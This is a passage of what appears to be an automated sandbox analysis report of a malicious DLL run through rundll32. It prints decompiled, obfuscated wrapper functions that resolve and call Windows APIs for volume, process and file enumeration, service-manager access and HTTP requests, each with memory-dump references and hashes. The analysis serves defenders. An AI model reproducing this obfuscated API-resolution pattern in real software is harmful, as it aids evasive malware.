                                                                                                        				_push(0);
                                                                                                        				_push(_a44);
                                                                                                        				_push(_a40);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(_a28);
                                                                                                        				_push(_a24);
                                                                                                        				_push(_a20);
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(__ecx);
                                                                                                        				E04EF2523(_t45);
                                                                                                        				_v36 = 0x72e62c;
                                                                                                        				_v32 = 0x6afee3;
                                                                                                        				_v28 = 0;
                                                                                                        				_v24 = 0;
                                                                                                        				_v12 = 0x241442;
                                                                                                        				_v12 = _v12 ^ 0x5f0a7563;
                                                                                                        				_v12 = _v12 * 0x4b;
                                                                                                        				_v12 = _v12 + 0xffff00d5;
                                                                                                        				_v12 = _v12 ^ 0xe298fffa;
                                                                                                        				_v20 = 0x629ccf;
                                                                                                        				_v20 = _v20 + 0xa262;
                                                                                                        				_v20 = _v20 ^ 0x006504c5;
                                                                                                        				_v8 = 0x8dfd52;
                                                                                                        				_v8 = _v8 * 0x5f;
                                                                                                        				_v8 = _v8 >> 0xe;
                                                                                                        				_v8 = _v8 << 0xd;
                                                                                                        				_v8 = _v8 ^ 0x1a5bea6c;
                                                                                                        				_v16 = 0x13a484;
                                                                                                        				_v16 = _v16 * 0x42;
                                                                                                        				_v16 = _v16 ^ 0x051e7b21;
                                                                                                        				E04ED2309(0x1c8, __ecx, __ecx, 0xfc0d3d9c, __ecx, 0x9c9047d0);
                                                                                                        				_t55 = GetVolumeInformationW(_a16, 0, 0, _t60, 0, 0, 0, 0); // executed
                                                                                                        				return _t55;
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 04EEA8E8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationVolume
                                                                                                        • String ID: ,r$cu_
                                                                                                        • API String ID: 2039140958-355032270
                                                                                                        • Opcode ID: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
                                                                                                        • Instruction ID: 89db24f0504392ef0ef5efed3ef28a59a02254091e0df2bdd589b459c6983a0f
                                                                                                        • Opcode Fuzzy Hash: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
                                                                                                        • Instruction Fuzzy Hash: ED21E0B1801249BB8F14CFA6DD49C9FBFB9EB86704F108099F910A2260D3B59A15DFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • QueryFullProcessImageNameW.KERNEL32(007CD4C5,00000000,00000000,31305EC1), ref: 04EDBFB0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FullImageNameProcessQuery
                                                                                                        • String ID: =.$^.c
                                                                                                        • API String ID: 3578328331-3776521896
                                                                                                        • Opcode ID: 07ae75dd8ddba432c77965de32a51c1b19153ce4c2545f6c391e89c1662625bf
                                                                                                        • Instruction ID: 76b0742044da6a3e3237b5f9d70b933452927bdf9a688ce0acce9e0274b10423
                                                                                                        • Opcode Fuzzy Hash: 07ae75dd8ddba432c77965de32a51c1b19153ce4c2545f6c391e89c1662625bf
                                                                                                        • Instruction Fuzzy Hash: 5A210475C00209BBDF59DFA4C94AAEEBFB1FB44704F208588E91476250D3B69B619F90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 91%
                                                                                                        			E04EDFBFA(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
                                                                                                        				unsigned int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				unsigned int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				signed int _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _t48;
                                                                                                        				int _t57;
                                                                                                        				signed int _t59;
                                                                                                        
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				E04EF2523(_t48);
                                                                                                        				_v28 = _v28 & 0x00000000;
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v36 = 0x49672e;
                                                                                                        				_v32 = 0xb6dd69;
                                                                                                        				_v16 = 0x714492;
                                                                                                        				_v16 = _v16 >> 4;
                                                                                                        				_v16 = _v16 + 0x8cae;
                                                                                                        				_v16 = _v16 + 0xf12f;
                                                                                                        				_v16 = _v16 ^ 0x0001c43a;
                                                                                                        				_v20 = 0xe1aff5;
                                                                                                        				_v20 = _v20 + 0x563d;
                                                                                                        				_v20 = _v20 ^ 0x00ec4f92;
                                                                                                        				_v12 = 0xff415;
                                                                                                        				_v12 = _v12 + 0x39cf;
                                                                                                        				_v12 = _v12 | 0x79f6ff5d;
                                                                                                        				_v12 = _v12 ^ 0x79f7d296;
                                                                                                        				_v8 = 0xdebe32;
                                                                                                        				_t59 = 0x1e;
                                                                                                        				_v8 = _v8 / _t59;
                                                                                                        				_v8 = _v8 >> 0xe;
                                                                                                        				_v8 = _v8 >> 0xe;
                                                                                                        				_v8 = _v8 ^ 0x0002d9b6;
                                                                                                        				E04ED2309(0x336, _t59, _t59, 0xd09d8658, _t59, 0x9c9047d0);
                                                                                                        				_t57 = FindClose(_a8); // executed
                                                                                                        				return _t57;
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • FindClose.KERNEL32(0001C43A), ref: 04EDFCC3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFind
                                                                                                        • String ID: .gI$=V
                                                                                                        • API String ID: 1863332320-2530093900
                                                                                                        • Opcode ID: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
                                                                                                        • Instruction ID: d92f94fcbc056f8bcdd3a6307895c1b1abb150f1e54009f4e8d802ac1137d28d
                                                                                                        • Opcode Fuzzy Hash: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
                                                                                                        • Instruction Fuzzy Hash: C12147B1D0020CEFEB04DFD5C94A9EEBBB0FB54318F10C099E62466240E3B95B549F90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 76%
                                                                                                        			E04EEE9E8(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* _t39;
                                                                                                        				int _t47;
                                                                                                        				void* _t51;
                                                                                                        
                                                                                                        				_push(_a16);
                                                                                                        				_t51 = __ecx;
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E04EF2523(_t39);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v28 = 0x7dd1c2;
                                                                                                        				_v20 = 0xe6ed41;
                                                                                                        				_v20 = _v20 ^ 0x6eedbecd;
                                                                                                        				_v20 = _v20 * 0x45;
                                                                                                        				_v20 = _v20 ^ 0xa90eba26;
                                                                                                        				_v16 = 0x25fde1;
                                                                                                        				_v16 = _v16 + 0xffffc5d1;
                                                                                                        				_v16 = _v16 | 0x325ad611;
                                                                                                        				_v16 = _v16 ^ 0x3277e624;
                                                                                                        				_v8 = 0x448e1b;
                                                                                                        				_v8 = _v8 | 0xd7f3ffef;
                                                                                                        				_v8 = _v8 ^ 0xcff08007;
                                                                                                        				_v8 = _v8 ^ 0x180d74c6;
                                                                                                        				_v12 = 0x3a9cbc;
                                                                                                        				_v12 = _v12 | 0xfe729dd7;
                                                                                                        				_v12 = _v12 ^ 0xfe7a3202;
                                                                                                        				E04ED2309(0x2de, __ecx, __ecx, 0xa7d3fbc8, __ecx, 0x9c9047d0);
                                                                                                        				_t47 = FindNextFileW(_t51, _a4); // executed
                                                                                                        				return _t47;
                                                                                                        			}













                                                                                                        APIs
                                                                                                        • FindNextFileW.KERNELBASE(00000000,FE7A3202,?,?,?,?,?,?,?,?,?,?,00000072), ref: 04EEEAA5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileFindNext
                                                                                                        • String ID: $w2$A
                                                                                                        • API String ID: 2029273394-2068021171
                                                                                                        • Opcode ID: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
                                                                                                        • Instruction ID: 51480dc49e61f95454b54e7b6e2433ed70794f0fc2c8877a21ce8705ae381f5e
                                                                                                        • Opcode Fuzzy Hash: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
                                                                                                        • Instruction Fuzzy Hash: 951112B1C0121DAFDF05DFE8DA068AEBFB4FB00304F108589E915B6260E3B55B209F95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 47%
                                                                                                        			E04ED8A5E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a24, WCHAR* _a36, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, WCHAR* _a56) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				unsigned int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				WCHAR* _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* _t45;
                                                                                                        				void* _t52;
                                                                                                        				void* _t57;
                                                                                                        
                                                                                                        				_push(_a56);
                                                                                                        				_t57 = __edx;
                                                                                                        				_push(_a52);
                                                                                                        				_push(_a48);
                                                                                                        				_push(_a44);
                                                                                                        				_push(0);
                                                                                                        				_push(_a36);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(_a24);
                                                                                                        				_push(0);
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__edx);
                                                                                                        				_push(__ecx);
                                                                                                        				E04EF2523(_t45);
                                                                                                        				_v32 = 0xd5d112;
                                                                                                        				_v28 = 0x50513d;
                                                                                                        				_v24 = 0;
                                                                                                        				_v12 = 0x46c43;
                                                                                                        				_v12 = _v12 + 0xffffdfef;
                                                                                                        				_v12 = _v12 | 0x9d8b3e1d;
                                                                                                        				_v12 = _v12 ^ 0x9d8347af;
                                                                                                        				_v20 = 0x816eb9;
                                                                                                        				_v20 = _v20 + 0xffff29e2;
                                                                                                        				_v20 = _v20 ^ 0x0080c9d8;
                                                                                                        				_v8 = 0x807982;
                                                                                                        				_v8 = _v8 | 0x5015719e;
                                                                                                        				_v8 = _v8 ^ 0xfbfa9e2f;
                                                                                                        				_v8 = _v8 ^ 0xab6f9dce;
                                                                                                        				_v16 = 0xec1576;
                                                                                                        				_v16 = _v16 >> 0xb;
                                                                                                        				_v16 = _v16 ^ 0x000e8763;
                                                                                                        				E04ED2309(0x18c, __ecx, __ecx, 0xb50c381d, __ecx, 0xc0cf1a4);
                                                                                                        				_t52 = HttpOpenRequestW(_t57, _a36, _a56, 0, 0, 0, _a24, 0); // executed
                                                                                                        				return _t52;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,00D5D112,00000000), ref: 04ED8B3A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: HttpOpenRequest
                                                                                                        • String ID: =QP
                                                                                                        • API String ID: 1984915467-456757808
                                                                                                        • Opcode ID: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
                                                                                                        • Instruction ID: cad95947b44ed418702ade2526c823db442dadaa967ce2061d500ef64985b0b4
                                                                                                        • Opcode Fuzzy Hash: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
                                                                                                        • Instruction Fuzzy Hash: 8621F3B2801209BB8F559F95CC49CDFBF79EF85704F109188BA1466220D3B18A65DFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 73%
                                                                                                        			E04EE42E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				long _v24;
                                                                                                        				long _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _t43;
                                                                                                        				char _t54;
                                                                                                        				signed int _t57;
                                                                                                        				void* _t62;
                                                                                                        				void* _t63;
                                                                                                        
                                                                                                        				_push(_a20);
                                                                                                        				_t62 = __edx;
                                                                                                        				_push(_a16);
                                                                                                        				_t63 = __ecx;
                                                                                                        				_push(0);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__edx);
                                                                                                        				_push(__ecx);
                                                                                                        				E04EF2523(_t43);
                                                                                                        				_v36 = 0xead706;
                                                                                                        				_v32 = 0x8aaadf;
                                                                                                        				_v28 = 0;
                                                                                                        				_v24 = 0;
                                                                                                        				_v12 = 0x3b6f9b;
                                                                                                        				_t57 = 0x3f;
                                                                                                        				_v12 = _v12 * 0xe;
                                                                                                        				_v12 = _v12 << 0x10;
                                                                                                        				_v12 = _v12 ^ 0x1a7fe3f0;
                                                                                                        				_v20 = 0x6318b1;
                                                                                                        				_v20 = _v20 | 0x2b2fc1f2;
                                                                                                        				_v20 = _v20 ^ 0x2b6f417a;
                                                                                                        				_v8 = 0xeb56a2;
                                                                                                        				_v8 = _v8 << 1;
                                                                                                        				_v8 = _v8 / _t57;
                                                                                                        				_v8 = _v8 * 0x2f;
                                                                                                        				_v8 = _v8 ^ 0x015d5ff9;
                                                                                                        				_v16 = 0x2619ef;
                                                                                                        				_v16 = _v16 << 6;
                                                                                                        				_v16 = _v16 ^ 0x098e35d6;
                                                                                                        				E04ED2309(_t57 + 0x4d, _t57, _t57, 0x52f9059f, _t57, 0x9c9047d0);
                                                                                                        				_t54 = RtlFreeHeap(_t62, 0, _t63); // executed
                                                                                                        				return _t54;
                                                                                                        			}

















                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 04EE43AA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID: zAo+
                                                                                                        • API String ID: 3298025750-440923707
                                                                                                        • Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
                                                                                                        • Instruction ID: 9683d8168941c3d1be4c8c559f5bdfb05627b250e177507578277600a3195022
                                                                                                        • Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
                                                                                                        • Instruction Fuzzy Hash: 482128B1D00219BF9B08DF99D98A8EEBFB9FB44344F508199E515A7240D3B16B149B90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 24%
                                                                                                        			E04EDF2CC(void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a32) {
                                                                                                        				unsigned int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				WCHAR* _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				void* __ecx;
                                                                                                        				void* _t36;
                                                                                                        				void* _t44;
                                                                                                        				void* _t46;
                                                                                                        
                                                                                                        				_push(_a32);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				E04EF2523(_t36);
                                                                                                        				_v28 = 0x481ca4;
                                                                                                        				_v24 = 0;
                                                                                                        				_v20 = 0xca1952;
                                                                                                        				_v20 = _v20 ^ 0x1684c8f8;
                                                                                                        				_v20 = _v20 ^ 0x16482d99;
                                                                                                        				_v12 = 0xc193bc;
                                                                                                        				_v12 = _v12 ^ 0x27e4a297;
                                                                                                        				_v12 = _v12 | 0xa7673761;
                                                                                                        				_v12 = _v12 ^ 0xa76f04da;
                                                                                                        				_v8 = 0xc5b902;
                                                                                                        				_push(0xc0cf1a4);
                                                                                                        				_push(_t45);
                                                                                                        				_push(0xb325898b);
                                                                                                        				_push(_t45);
                                                                                                        				_v8 = _v8 * 0x4e;
                                                                                                        				_v8 = _v8 >> 4;
                                                                                                        				_v8 = _v8 ^ 0x03c56f69;
                                                                                                        				_v16 = 0x24ec4f;
                                                                                                        				_v16 = _v16 + 0xffffc13d;
                                                                                                        				_v16 = _v16 ^ 0x002fbbc3;
                                                                                                        				_push(_t45);
                                                                                                        				_t46 = 0x50;
                                                                                                        				E04ED2309(_t46);
                                                                                                        				_t44 = InternetOpenW(0, _a12, 0, 0, 0); // executed
                                                                                                        				return _t44;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(00000000,16482D99,00000000,00000000,00000000), ref: 04EDF383
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InternetOpen
                                                                                                        • String ID: O$
                                                                                                        • API String ID: 2038078732-838329570
                                                                                                        • Opcode ID: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
                                                                                                        • Instruction ID: b28519d9cb7500d79d3d9aa510a2ca379a27016263bda538a950dcbe4810f22b
                                                                                                        • Opcode Fuzzy Hash: bfd598ea9fc20005dd18c51756325e876dca57c81b5a8b40325e3a3f8c113345
                                                                                                        • Instruction Fuzzy Hash: 9C1144B0C0121DBB9B15DFA5CC4A8DFBFB8EF05754F108589F914B6110C3B15A54DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 19%
                                                                                                        			E04EEA4A0(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W _a8) {
                                                                                                        				unsigned int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				void* _t40;
                                                                                                        				int _t49;
                                                                                                        				void* _t51;
                                                                                                        				void* _t54;
                                                                                                        
                                                                                                        				_push(_a8);
                                                                                                        				_t54 = __ecx;
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E04EF2523(_t40);
                                                                                                        				_v36 = 0x141422;
                                                                                                        				asm("stosd");
                                                                                                        				_push(0x9c9047d0);
                                                                                                        				asm("stosd");
                                                                                                        				_push(__ecx);
                                                                                                        				_push(0xb41b9fb1);
                                                                                                        				_push(__ecx);
                                                                                                        				asm("stosd");
                                                                                                        				_v20 = 0x6e8e4;
                                                                                                        				_v20 = _v20 << 1;
                                                                                                        				_push(__ecx);
                                                                                                        				_t51 = 0x1c;
                                                                                                        				_v20 = _v20 * 0x65;
                                                                                                        				_v20 = _v20 ^ 0x05792b89;
                                                                                                        				_v8 = 0x17694a;
                                                                                                        				_v8 = _v8 >> 0xd;
                                                                                                        				_v8 = _v8 + 0x7593;
                                                                                                        				_v8 = _v8 + 0x3dc6;
                                                                                                        				_v8 = _v8 ^ 0x000c8dea;
                                                                                                        				_v16 = 0x6183ab;
                                                                                                        				_v16 = _v16 << 3;
                                                                                                        				_v16 = _v16 | 0x753fc9cb;
                                                                                                        				_v16 = _v16 ^ 0x773f8770;
                                                                                                        				_v12 = 0x2bda5d;
                                                                                                        				_v12 = _v12 + 0xffff2e51;
                                                                                                        				_v12 = _v12 ^ 0x7ae43c2f;
                                                                                                        				_v12 = _v12 ^ 0x7acc85af;
                                                                                                        				E04ED2309(_t51);
                                                                                                        				_t49 = Process32NextW(_t54, _a8); // executed
                                                                                                        				return _t49;
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • Process32NextW.KERNEL32(00000000,773F8770,?,?,?,?,?,?,?,?,00000000), ref: 04EEA55E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: NextProcess32
                                                                                                        • String ID: /<z
                                                                                                        • API String ID: 1850201408-2186077011
                                                                                                        • Opcode ID: ee7739c6ebbc081d39b179a51fe32828a234b3ca8a11d0ef1921ab7f81e9d2f1
                                                                                                        • Instruction ID: 778c36009299ec7ae74cf590a8b2d66a919d9d4c592dfc11710c8ecd8a373af1
                                                                                                        • Opcode Fuzzy Hash: ee7739c6ebbc081d39b179a51fe32828a234b3ca8a11d0ef1921ab7f81e9d2f1
                                                                                                        • Instruction Fuzzy Hash: 18215675C01219FBDF04CF95C8098EEBBB4FB44314F108589E418A6250D3B96B459F90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 04EDE168
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoNativeSystem
                                                                                                        • String ID: |p
                                                                                                        • API String ID: 1721193555-2455131449
                                                                                                        • Opcode ID: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
                                                                                                        • Instruction ID: b9e8a9fce13a7fa4f55946634eaff8b1644946ae71f8be5b2788c33274e32d7b
                                                                                                        • Opcode Fuzzy Hash: 1373000f67fd09352ab480020baae7fa00b59f1f2ab89e5c019d1be64afd4c0b
                                                                                                        • Instruction Fuzzy Hash: AD2138B6D00309EFEB48DFA4C8468EEBBB4FB44314F108599E41566290D3B86B50CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 26%
                                                                                                        			E04EEFE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
                                                                                                        				unsigned int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				short* _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* __ecx;
                                                                                                        				void* _t34;
                                                                                                        				void* _t41;
                                                                                                        				void* _t43;
                                                                                                        
                                                                                                        				_push(_a16);
                                                                                                        				_push(0);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(0);
                                                                                                        				E04EF2523(_t34);
                                                                                                        				_v32 = 0xfebeef;
                                                                                                        				_v28 = 0x6b4d4f;
                                                                                                        				_v24 = 0;
                                                                                                        				_v20 = 0x72d4d3;
                                                                                                        				_v20 = _v20 + 0x7ce2;
                                                                                                        				_v20 = _v20 ^ 0x0072d8bc;
                                                                                                        				_v16 = 0x618a6;
                                                                                                        				_v16 = _v16 + 0x2ac;
                                                                                                        				_v16 = _v16 ^ 0x00083b16;
                                                                                                        				_v12 = 0x17740f;
                                                                                                        				_v12 = _v12 + 0x9d82;
                                                                                                        				_v12 = _v12 ^ 0x0012bdfc;
                                                                                                        				_v8 = 0xba692b;
                                                                                                        				_v8 = _v8 ^ 0x31422697;
                                                                                                        				_v8 = _v8 >> 0x10;
                                                                                                        				_v8 = _v8 ^ 0x0005552e;
                                                                                                        				_push(0x21ce39be);
                                                                                                        				_push(0xb53dc03);
                                                                                                        				_push(_t42);
                                                                                                        				_push(_t42);
                                                                                                        				_t43 = 0x15;
                                                                                                        				E04ED2309(_t43);
                                                                                                        				_t41 = OpenSCManagerW(0, 0, _a16); // executed
                                                                                                        				return _t41;
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,04EE5191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 04EEFF4C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
